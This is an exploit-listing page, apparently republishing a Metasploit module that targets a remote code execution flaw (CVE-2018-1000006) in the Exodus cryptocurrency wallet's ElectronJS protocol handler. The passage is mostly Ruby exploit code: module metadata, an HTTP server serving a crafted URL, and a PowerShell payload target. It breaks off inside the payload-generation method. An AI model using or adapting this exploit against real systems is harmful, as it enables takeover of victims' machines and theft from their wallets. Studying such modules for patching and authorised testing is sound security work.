Exploits / Vulnerability Discovered : 2018-03-29 |
Type : remote |
Platform : windows
This exploit / vulnerability Exodus wallet (electronjs framework) remote code execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
'Description' => %q(
This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
a vulnerability in the ElectronJS Framework protocol handler can be used to
get arbitrary command execution if the user clicks on a specially crafted URL.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Wflki', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'DefaultOptions' =>
{
'SRVPORT' => '80',
'URIPATH' => '/',
},
'References' =>
[
[ 'EDB', '43899' ],
[ 'BID', '102796' ],
[ 'CVE', '2018-1000006' ],
],
'Platform' => 'win',
'Targets' =>
[
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 25 2018'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
], self.class
)
end
def gen_psh(url)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl